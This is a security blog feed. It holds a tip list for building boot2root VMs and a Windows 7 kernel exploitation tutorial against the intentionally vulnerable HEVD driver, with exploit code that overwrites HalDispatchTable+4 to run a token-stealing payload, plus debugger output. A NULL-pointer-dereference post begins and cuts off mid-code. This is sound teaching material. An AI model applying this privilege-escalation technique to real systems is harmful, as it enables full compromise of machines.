abatchy's blog Just another security blog. http://abatchy17.github.io Tips on designing boot2root challenges <p><em>During the past couple of years I published a couple of boot2root challenges on <a href="https://www.vulnhub.com/author/abatchy,393/">Vulnhub</a> and had some asks on how to properly create such a challenge. I hope this quick post gives you some guidance.</em></p> <hr /> <p><strong>1. Use the official ISOs to create the VM:</strong> Avoid using pre-created VMs, many times they aren’t ported properly to be distributed and/or contain unwanted bloatware. Using the official ISOs gives you flexibility on creating the VM hypvervisor-agnostic, meaning it should have no dependencies on whether you created them on VMWare/VirtualBox, so don’t install the guest additions.</p> <p><strong>2. Configure the network settings:</strong> Let the VM rely on the DHCP server, take a look at the Vulnhub “Isolating the lab” section <a href="https://www.vulnhub.com/lab/network/">here</a>. Don’t assign it a static IP unless needed, and make sure the player knows about that and any setup required.</p> <p><strong>3. Patch it up:</strong> You normally want players to find the challenges you implemented, not the ones that result from an outdated vulnerable service/kernel. Updating it will reduce the odds of <a href="https://dirtycow.ninja/">this</a> happening.</p> <p><strong>4. Choose a theme:</strong> Deciding on a theme turns out to be quite important as some people prefer realistic challenges; would I find this in a production environment? Dealing with unrealistic challenges without expecting them could be frustrating. Yet don’t be afraid to stray from that, there are lots of great unrealistic boot2roots on vulnhub.</p> <p><strong>5. Create the attack surface:</strong> This is where the real work begins. You’ll want to craft a path (or more) for players to discover. Maybe some dead ends. Since players attack the VM from an attacker machine, avoid them being able to go from attacking remotely directly to root. At the very least it should go <code class="highlighter-rouge">remote -&gt; local -&gt; root</code>. Even more fun is to create multiple scenarios.</p> <p><strong>6. Take snapshots and automate:</strong> Taking snapshots will give you the flexibility on dismissing corrupted iterations. Automating various tasks should be a good ROI, like deleting temporary files and such.</p> <p><strong>7. Remove unwanted services/files:</strong> Removing the GUI layer will save well on space.</p> <p><strong>8. Have test bunnies:</strong> Many people would love to help you test the challenges, another pair of eyes does wonders.</p> <p><strong>9. Update <code class="highlighter-rouge">/etc/motd</code>:</strong> This is your chance to put a note for the player, personalize the VM with a name or even some ASCII artwork.</p> <p><strong>10. Export to OVA format:</strong> Avoid uploading the disk file as many times it might have dependencies on the HW you created it on or misconfigured. Instead export the VMs to OVF format so the hypervisor properly mounts them. Both <a href="https://docs.vmware.com/en/VMware-Fusion/11/com.vmware.fusion.using.doc/GUID-16E390B1-829D-4289-8442-270A474C106A.html">VMWare</a> and <a href="https://docs.oracle.com/cd/E26217_01/E26796/html/qs-import-vm.html">VirtualBox</a> support this.</p> <p><em>-Abatchy</em></p> Mon, 18 Feb 2019 10:00:00 +0000 http://abatchy17.github.io/2019/02/tips-on-creating-vulnerable-vms http://abatchy17.github.io/2019/02/tips-on-creating-vulnerable-vms [Kernel Exploitation] 7: Arbitrary Overwrite (Win7 x86) <p><em>Exploit code can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/ArbitraryOverwrite/Win7_x86_SP1">here</a>.</em></p> <p><em>Walkthroughs for Win 10 x64 in a future post.</em></p> <hr /> <h3 id="1-the-vulnerability">1. The vulnerability</h3> <p>Link to code <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/3838d5599940305d5f862109d39379f11a47234c/Driver/ArbitraryOverwrite.c#L64">here</a>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">NTSTATUS</span> <span class="nf">TriggerArbitraryOverwrite</span><span class="p">(</span><span class="n">IN</span> <span class="n">PWRITE_WHAT_WHERE</span> <span class="n">UserWriteWhatWhere</span><span class="p">)</span> <span class="p">{</span> <span class="n">PULONG_PTR</span> <span class="n">What</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="n">PULONG_PTR</span> <span class="n">Where</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="n">NTSTATUS</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_SUCCESS</span><span class="p">;</span> <span class="n">PAGED_CODE</span><span class="p">();</span> <span class="kr">__try</span> <span class="p">{</span> <span class="c1">// Verify if the buffer resides in user mode </span> <span class="n">ProbeForRead</span><span class="p">((</span><span class="n">PVOID</span><span class="p">)</span><span class="n">UserWriteWhatWhere</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">WRITE_WHAT_WHERE</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">__alignof</span><span class="p">(</span><span class="n">WRITE_WHAT_WHERE</span><span class="p">));</span> <span class="n">What</span> <span class="o">=</span> <span class="n">UserWriteWhatWhere</span><span class="o">-&gt;</span><span class="n">What</span><span class="p">;</span> <span class="n">Where</span> <span class="o">=</span> <span class="n">UserWriteWhatWhere</span><span class="o">-&gt;</span><span class="n">Where</span><span class="p">;</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserWriteWhatWhere: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">UserWriteWhatWhere</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] WRITE_WHAT_WHERE Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">WRITE_WHAT_WHERE</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserWriteWhatWhere-&gt;What: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">What</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserWriteWhatWhere-&gt;Where: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Where</span><span class="p">);</span> <span class="cp">#ifdef SECURE </span> <span class="c1">// Secure Note: This is secure because the developer is properly validating if address </span> <span class="c1">// pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead() </span> <span class="c1">// routine before performing the write operation </span> <span class="n">ProbeForRead</span><span class="p">((</span><span class="n">PVOID</span><span class="p">)</span><span class="n">Where</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PULONG_PTR</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">__alignof</span><span class="p">(</span><span class="n">PULONG_PTR</span><span class="p">));</span> <span class="n">ProbeForRead</span><span class="p">((</span><span class="n">PVOID</span><span class="p">)</span><span class="n">What</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">PULONG_PTR</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">__alignof</span><span class="p">(</span><span class="n">PULONG_PTR</span><span class="p">));</span> <span class="o">*</span><span class="p">(</span><span class="n">Where</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">What</span><span class="p">);</span> <span class="cp">#else </span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Triggering Arbitrary Overwrite</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="c1">// Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability </span> <span class="c1">// because the developer is writing the value pointed by 'What' to memory location </span> <span class="c1">// pointed by 'Where' without properly validating if the values pointed by 'Where' </span> <span class="c1">// and 'What' resides in User mode </span> <span class="o">*</span><span class="p">(</span><span class="n">Where</span><span class="p">)</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">What</span><span class="p">);</span> <span class="cp">#endif </span> <span class="p">}</span> <span class="kr">__except</span> <span class="p">(</span><span class="n">EXCEPTION_EXECUTE_HANDLER</span><span class="p">)</span> <span class="p">{</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">GetExceptionCode</span><span class="p">();</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Exception Code: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">Status</span><span class="p">);</span> <span class="p">}</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>The vulnerability is obvious, <code class="highlighter-rouge">TriggerArbitraryOverwrite</code> allows overwriting a controlled value at a controlled address. This is very powerful, but can you come up with a way to exploit this without having another vulnerability?</p> <p>Let’s consider some scenarios (that won’t work but are worth thinking about):</p> <ol> <li> <p>Overwrite a return address: <br /> Needs an infoleak to reveal the stack layout or a read primitive.</p> </li> <li> <p>Overwriting the process token with a SYSTEM one:<br /> Need to know the <code class="highlighter-rouge">EPROCESS</code> address of the SYSTEM process.</p> </li> <li> <p>Overwrite a function pointer called with kernel privileges:<br /> Now that’s a good one, an excellent documentation on a reliable (11-years old!) technique is <a href="http://shinnai.altervista.org/papers_videos/ECFID.pdf">Exploiting Common Flaws in Drivers</a>.</p> </li> </ol> <hr /> <h4 id="haldll-haldispatchtable-and-function-pointers">hal.dll, HalDispatchTable and function pointers</h4> <p><code class="highlighter-rouge">hal.dll</code> stands for Hardware Abstraction Layer, basically an interface to interacting with hardware without worrying about hardware-specific details. This allows Windows to be portable.</p> <p><code class="highlighter-rouge">HalDispatchTable</code> is a table containing function pointers to HAL routines. Let’s examine it a bit with WinDBG.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; dd HalDispatchTable // Display double words at HalDispatchTable 82970430 00000004 828348a2 828351b4 82afbad7 82970440 00000000 828455ba 829bc507 82afb3d8 82970450 82afb683 8291c959 8295d757 8295d757 82970460 828346ce 82834f30 82811178 82833dce 82970470 82afbaff 8291c98b 8291caa1 828350f6 82970480 8291caa1 8281398c 8281b4f0 82892c8c 82970490 82af8d7f 00000000 82892c9c 829b3c1c 829704a0 00000000 82892cac 82af8f77 00000000 kd&gt; ln 828348a2 Browse module Set bu breakpoint (828348a2) hal!HaliQuerySystemInformation | (82834ad0) hal!HalpAcpiTimerInit Exact matches: hal!HaliQuerySystemInformation (&lt;no parameter info&gt;) kd&gt; ln 828351b4 Browse module Set bu breakpoint (828351b4) hal!HalpSetSystemInformation | (82835234) hal!HalpDpReplaceEnd Exact matches: hal!HalpSetSystemInformation (&lt;no parameter info&gt;) </code></pre></div></div> <p>First entry at <code class="highlighter-rouge">HalDispatchTable</code> doesn’t seem to be populated but <code class="highlighter-rouge">HalDispatchTable+4</code> points to <code class="highlighter-rouge">HaliQuerySystemInformation</code> and <code class="highlighter-rouge">HalDispatchTable+8</code> points to <code class="highlighter-rouge">HalpSetSystemInformation</code>.</p> <p>These locations are writable and we can calculate their exact location easily (more on that later). <code class="highlighter-rouge">HaliQuerySystemInformation</code> is the lesser used one of the two, so we can put the address of our shellcode at <code class="highlighter-rouge">HalDispatchTable+4</code> and make a user-mode call that will end up calling this function.</p> <p><code class="highlighter-rouge">HaliQuerySystemInformation</code> is called by the undocumented <code class="highlighter-rouge">NtQueryIntervalProfile</code> (which according to the linked article is a “very low demanded API”), let’s take a look with WinDBG:</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; uf NtQueryIntervalProfile ...snip... nt!NtQueryIntervalProfile+0x6b: 82b55ec2 call nt!KeQueryIntervalProfile (82b12c97) ...snip... kd&gt; uf nt!KeQueryIntervalProfile ...snip... nt!KeQueryIntervalProfile+0x14: 82b12cab mov dword ptr [ebp-10h],eax 82b12cae lea eax,[ebp-4] 82b12cb1 push eax 82b12cb2 lea eax,[ebp-10h] 82b12cb5 push eax 82b12cb6 push 0Ch 82b12cb8 push 1 82b12cba call dword ptr [nt!HalDispatchTable+0x4 (82970434)] 82b12cc0 test eax,eax 82b12cc2 jl nt!KeQueryIntervalProfile+0x38 (82b12ccf) Branch ...snip... </code></pre></div></div> <p>Function at <code class="highlighter-rouge">[nt!HalDispatchTable+0x4]</code> gets called at <code class="highlighter-rouge">nt!KeQueryIntervalProfile+0x23</code> which we can trigger from user-mode. Hopefully, we won’t run into any trouble overwriting that entry.</p> <hr /> <p>The exploit will do the following:</p> <ol> <li>Get <code class="highlighter-rouge">HalDispatchTable</code> location in the kernel.</li> <li>Overwrite <code class="highlighter-rouge">HalDispatchTable+4</code> with the address of our payload.</li> <li>Calculate the address of <code class="highlighter-rouge">NtQueryIntervalProfile</code> and call it.</li> </ol> <hr /> <h3 id="2-getting-the-address-of-haldispatchtable">2. Getting the address of <code class="highlighter-rouge">HalDispatchTable</code></h3> <p><code class="highlighter-rouge">HalDispatchTable</code> exists in the kernel executive (ntoskrnl or another instance depending on the OS/processor). To get its address we need to:</p> <ol> <li>Get kernel’s base address in kernel using <code class="highlighter-rouge">NtQuerySystemInformation</code>.</li> <li>Load kernel in usermode and get the offset to <code class="highlighter-rouge">HalDispatchTable</code>.</li> <li>Add the offset to kernel’s base address.</li> </ol> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYSTEM_MODULE</span> <span class="n">krnlInfo</span> <span class="o">=</span> <span class="o">*</span><span class="n">getNtoskrnlInfo</span><span class="p">();</span> <span class="c1">// Get kernel base address in kernelspace </span><span class="n">ULONG</span> <span class="n">addr_ntoskrnl</span> <span class="o">=</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">krnlInfo</span><span class="p">.</span><span class="n">ImageBaseAddress</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Found address to ntoskrnl.exe at 0x%x.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">addr_ntoskrnl</span><span class="p">);</span> <span class="c1">// Load kernel in use in userspace to get the offset to HalDispatchTable // NOTE: DO NOT HARDCODE KERNEL MODULE NAME </span><span class="n">printf</span><span class="p">(</span><span class="s">"[+] Kernel in use: %s.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">krnlInfo</span><span class="p">.</span><span class="n">Name</span><span class="p">);</span> <span class="kt">char</span><span class="o">*</span> <span class="n">krnl_name</span> <span class="o">=</span> <span class="n">strrchr</span><span class="p">((</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">krnlInfo</span><span class="p">.</span><span class="n">Name</span><span class="p">,</span> <span class="sc">'\\'</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span> <span class="n">HMODULE</span> <span class="n">user_ntoskrnl</span> <span class="o">=</span> <span class="n">LoadLibraryEx</span><span class="p">(</span><span class="n">krnl_name</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span><span class="n">DONT_RESOLVE_DLL_REFERENCES</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">user_ntoskrnl</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[-] Failed to load kernel image.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Loaded kernel in usermode using LoadLibraryEx: 0x%x.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">user_ntoskrnl</span><span class="p">);</span> <span class="n">ULONG</span> <span class="n">user_HalDispatchTable</span> <span class="o">=</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">user_ntoskrnl</span><span class="p">,</span><span class="s">"HalDispatchTable"</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">user_HalDispatchTable</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[-] Failed to locate HalDispatchTable.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Found HalDispatchTable in usermode: 0x%x.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">user_HalDispatchTable</span><span class="p">);</span> <span class="c1">// Calculate address of HalDispatchTable in kernelspace </span><span class="n">ULONG</span> <span class="n">addr_HalDispatchTable</span> <span class="o">=</span> <span class="n">addr_ntoskrnl</span> <span class="o">-</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">user_ntoskrnl</span> <span class="o">+</span><span class="n">user_HalDispatchTable</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[+] Found address to HalDispatchTable at 0x%x.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="n">addr_HalDispatchTable</span><span class="p">);</span> </code></pre></div></div> <hr /> <h3 id="3-overwriting-haldispatchtable4">3. Overwriting <code class="highlighter-rouge">HalDispatchTable+4</code></h3> <p>To do this, we just need to submit a buffer that gets cast to <code class="highlighter-rouge">WRITE_WHAT_WHERE</code>. Basically two pointers, one for <code class="highlighter-rouge">What</code> and another for <code class="highlighter-rouge">Where</code>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">typedef</span> <span class="k">struct</span> <span class="n">_WRITE_WHAT_WHERE</span> <span class="p">{</span> <span class="n">PULONG_PTR</span> <span class="n">What</span><span class="p">;</span> <span class="n">PULONG_PTR</span> <span class="n">Where</span><span class="p">;</span> <span class="p">}</span> <span class="n">WRITE_WHAT_WHERE</span><span class="p">,</span> <span class="o">*</span><span class="n">PWRITE_WHAT_WHERE</span><span class="p">;</span> </code></pre></div></div> <p>Notice that these are pointers.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">ULONG</span> <span class="n">What</span> <span class="o">=</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="o">&amp;</span><span class="n">StealToken</span><span class="p">;</span> <span class="o">*</span><span class="n">uBuffer</span> <span class="o">=</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="o">&amp;</span><span class="n">What</span><span class="p">;</span> <span class="o">*</span><span class="p">(</span><span class="n">uBuffer</span> <span class="o">+</span> <span class="mi">1</span><span class="p">)</span> <span class="o">=</span> <span class="p">(</span><span class="n">addr_HalDispatchTable</span> <span class="o">+</span> <span class="mi">4</span><span class="p">);</span> <span class="n">DWORD</span> <span class="n">bytesRet</span><span class="p">;</span> <span class="n">DeviceIoControl</span><span class="p">(</span> <span class="n">driver</span><span class="p">,</span> <span class="n">HACKSYS_EVD_IOCTL_ARBITRARY_OVERWRITE</span><span class="p">,</span> <span class="n">uBuffer</span><span class="p">,</span> <span class="n">SIZE</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">bytesRet</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> </code></pre></div></div> <hr /> <p>Now let’s test what we have. Put breakpoint right before the exploit gets triggered.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; bu HEVD!TriggerArbitraryOverwrite 0x61 kd&gt; g [+] UserWriteWhatWhere: 0x000E0000 [+] WRITE_WHAT_WHERE Size: 0x8 [+] UserWriteWhatWhere-&gt;What: 0x0025FF38 [+] UserWriteWhatWhere-&gt;Where: 0x82966434 [+] Triggering Arbitrary Overwrite Breakpoint 2 hit HEVD!TriggerArbitraryOverwrite+0x61: 93d71b69 mov eax,dword ptr [edi] </code></pre></div></div> <p>Next’ let’s validate the data.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; dd 0x0025FF38 0025ff38 00f012d8 bae57df8 0025ff88 00f014d9 0025ff48 00000001 002a06a8 0029e288 bae57d30 0025ff58 00000000 00000000 7ffdc000 2c407500 0025ff68 00000001 00769cbf 0025ff54 96a5085a 0025ff78 0025ffc4 00f01c7b ba30aa60 00000000 0025ff88 0025ff94 75ebee1c 7ffdc000 0025ffd4 0025ff98 77b23ab3 7ffdc000 779af1ec 00000000 0025ffa8 00000000 7ffdc000 00000000 00000000 kd&gt; ln 00f012d8 Browse module Set bu breakpoint [C:\Users\abatchy\source\repos\HEVD\HEVD\shell32.asm @ 6] (00f012d8) HEVD_f00000!StealToken | (00f01312) HEVD_f00000!__security_check_cookie Exact matches: HEVD_f00000!StealToken (void) </code></pre></div></div> <p>Ok good, we passed a pointer to the payload as expected. Let’s verify the “where” part.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; ln 0x82966434 Browse module Set bu breakpoint (82966430) nt!HalDispatchTable+0x4 | (8296648c) nt!BuiltinCallbackReg </code></pre></div></div> <p><code class="highlighter-rouge">Where</code> points to <code class="highlighter-rouge">nt!HalDispatchTable+0x4</code> as expected, cool.</p> <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>kd&gt; p HEVD!TriggerArbitraryOverwrite+0x63: 93d71b6b mov dword ptr [ebx],eax kd&gt; p HEVD!TriggerArbitraryOverwrite+0x65: 93d71b6d jmp HEVD!TriggerArbitraryOverwrite+0x8b (93d71b93) kd&gt; dd HalDispatchTable 0052c430 00000004 006b7aaf 006b7ac3 006b7ad7 0052c440 00000000 004015ba 00578507 006b73d8 0052c450 006b7683 004d8959 00519757 00519757 0052c460 004d8966 004d8977 00000000 006b8de7 0052c470 006b7aff 004d898b 004d8aa1 006b7b11 0052c480 004d8aa1 00000000 00000000 0044ec8c 0052c490 006b4d7f 00000000 0044ec9c 0056fc1c 0052c4a0 00000000 0044ecac 006b4f77 00000000 </code></pre></div></div> <hr /> <h3 id="4-triggering-the-payload">4. Triggering the payload</h3> <p>Like explained earlier, we need to call <code class="highlighter-rouge">NtQueryIntervalProfile</code> which address can be resolved from <code class="highlighter-rouge">ntdll.dll</code>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Trigger the payload by calling NtQueryIntervalProfile() </span><span class="n">HMODULE</span> <span class="n">ntdll</span> <span class="o">=</span> <span class="n">GetModuleHandle</span><span class="p">(</span><span class="s">"ntdll"</span><span class="p">);</span> <span class="n">PtrNtQueryIntervalProfile</span> <span class="n">_NtQueryIntervalProfile</span> <span class="o">=</span><span class="p">(</span><span class="n">PtrNtQueryIntervalProfile</span><span class="p">)</span><span class="n">GetProcAddress</span><span class="p">(</span><span class="n">ntdll</span><span class="p">,</span><span class="s">"NtQueryIntervalProfile"</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="n">_NtQueryIntervalProfile</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"[-] Failed to get address of NtQueryIntervalProfile.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span> <span class="p">}</span> <span class="n">ULONG</span> <span class="n">whatever</span><span class="p">;</span> <span class="n">_NtQueryIntervalProfile</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">whatever</span><span class="p">);</span> </code></pre></div></div> <p><img src="http://abatchy17.github.io/images/kernel7.png" alt="snip" /></p> <hr /> <p>Full code to exploit <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/ArbitraryOverwrite/Win7_x86_SP1">here</a>.</p> <p>- Abatchy</p> Wed, 24 Jan 2018 00:00:00 +0000 http://abatchy17.github.io/2018/01/kernel-exploitation-7 http://abatchy17.github.io/2018/01/kernel-exploitation-7 [Kernel Exploitation] 6: NULL pointer dereference <p><em>Exploit code can be found <a href="https://github.com/abatchy17/HEVD-Exploits/tree/master/NullPageDereference">here</a>.</em></p> <hr /> <h3 id="0-kernel-mode-heaps-aka-pools">0. Kernel-mode heaps (aka pools)</h3> <p>Heaps are dynamically allocated memory regions, unlike the stack which is statically allocated and is of a defined size.</p> <p>Heaps allocated for kernel-mode components are called pools and are divided into two main types:</p> <ol> <li> <p><strong>Non-paged pool</strong>: These are guaranteed to reside in the RAM at all time, and are mostly used to store data that may get accessed in case of a hardware interrupt (at that point, the system can’t handle page faults). Allocating such memory can be done through the driver routine <a href="https://msdn.microsoft.com/en-us/library/ff544520.aspx"><code class="highlighter-rouge">ExAllocatePoolWithTag</code></a>.</p> </li> <li> <p><strong>Paged pool</strong>: This memory allocation can be paged in and out the paging file, normally on the root installation of Windows (Ex: C:\pagefile.sys).</p> </li> </ol> <p>Allocating such memory can be done through the driver routine <a href="https://msdn.microsoft.com/en-us/library/windows/hardware/ff544520(v=vs.85).aspx"><code class="highlighter-rouge">ExAllocatePoolWithTag</code></a> and specifying the <code class="highlighter-rouge">poolType</code> and a 4 byte “tag”.</p> <p>To monitor pool allocations you can use <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/poolmon"><code class="highlighter-rouge">poolmon</code></a>.</p> <p>If you want to know more about this topic, I strongly recommend reading <a href="https://blogs.technet.microsoft.com/markrussinovich/2009/03/10/pushing-the-limits-of-windows-paged-and-nonpaged-pool/">“Pushing the Limits of Windows: Paged and Nonpaged Pool”</a> post and (the entire series too!).</p> <hr /> <h3 id="1-the-vulnerability">1. The vulnerability</h3> <p>Link to code <a href="https://github.com/hacksysteam/HackSysExtremeVulnerableDriver/blob/3838d5599940305d5f862109d39379f11a47234c/Driver/NullPointerDereference.c#L74">here</a>.</p> <div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">NTSTATUS</span> <span class="nf">TriggerNullPointerDereference</span><span class="p">(</span><span class="n">IN</span> <span class="n">PVOID</span> <span class="n">UserBuffer</span><span class="p">)</span> <span class="p">{</span> <span class="n">ULONG</span> <span class="n">UserValue</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">ULONG</span> <span class="n">MagicValue</span> <span class="o">=</span> <span class="mh">0xBAD0B0B0</span><span class="p">;</span> <span class="n">NTSTATUS</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_SUCCESS</span><span class="p">;</span> <span class="n">PNULL_POINTER_DEREFERENCE</span> <span class="n">NullPointerDereference</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span> <span class="n">PAGED_CODE</span><span class="p">();</span> <span class="kr">__try</span> <span class="p">{</span> <span class="c1">// Verify if the buffer resides in user mode </span> <span class="n">ProbeForRead</span><span class="p">(</span><span class="n">UserBuffer</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">NULL_POINTER_DEREFERENCE</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">__alignof</span><span class="p">(</span><span class="n">NULL_POINTER_DEREFERENCE</span><span class="p">));</span> <span class="c1">// Allocate Pool chunk </span> <span class="n">NullPointerDereference</span> <span class="o">=</span> <span class="p">(</span><span class="n">PNULL_POINTER_DEREFERENCE</span><span class="p">)</span> <span class="n">ExAllocatePoolWithTag</span><span class="p">(</span><span class="n">NonPagedPool</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">NULL_POINTER_DEREFERENCE</span><span class="p">),</span> <span class="p">(</span><span class="n">ULONG</span><span class="p">)</span><span class="n">POOL_TAG</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">NullPointerDereference</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Unable to allocate Pool chunk </span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[-] Unable to allocate Pool chunk</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span> <span class="n">Status</span> <span class="o">=</span> <span class="n">STATUS_NO_MEMORY</span><span class="p">;</span> <span class="k">return</span> <span class="n">Status</span><span class="p">;</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Pool Tag: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">STRINGIFY</span><span class="p">(</span><span class="n">POOL_TAG</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Pool Type: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">STRINGIFY</span><span class="p">(</span><span class="n">NonPagedPool</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Pool Size: 0x%X</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">NULL_POINTER_DEREFERENCE</span><span class="p">));</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] Pool Chunk: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">NullPointerDereference</span><span class="p">);</span> <span class="p">}</span> <span class="c1">// Get the value from user mode </span> <span class="n">UserValue</span> <span class="o">=</span> <span class="o">*</span><span class="p">(</span><span class="n">PULONG</span><span class="p">)</span><span class="n">UserBuffer</span><span class="p">;</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] UserValue: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">UserValue</span><span class="p">);</span> <span class="n">DbgPrint</span><span class="p">(</span><span class="s">"[+] NullPointerDereference: 0x%p</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">NullPointerDereference</span><span class="p">);</span> <span class="c1">// Validate the magic value </span> <span class="k">if</span> <span class="p">(</span><span class="n">UserValue</span> <span class="o">==</span> <span class="n">MagicValue</span><span class="p">)</span> <span class="p">{</span> <span class="n">NullPointerDereference</span><span class="o">-&gt;</span><span class="n">Value</span> <span class="o">=</span> <span class="n">UserValue</span><span class="p">;</span> <span class="n">NullPointerDereference</span><span class="o">-&gt;</span><span class="n">Callback</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">NullPointerDereferenceObjectCallback</span><span class="p">;</span> <span 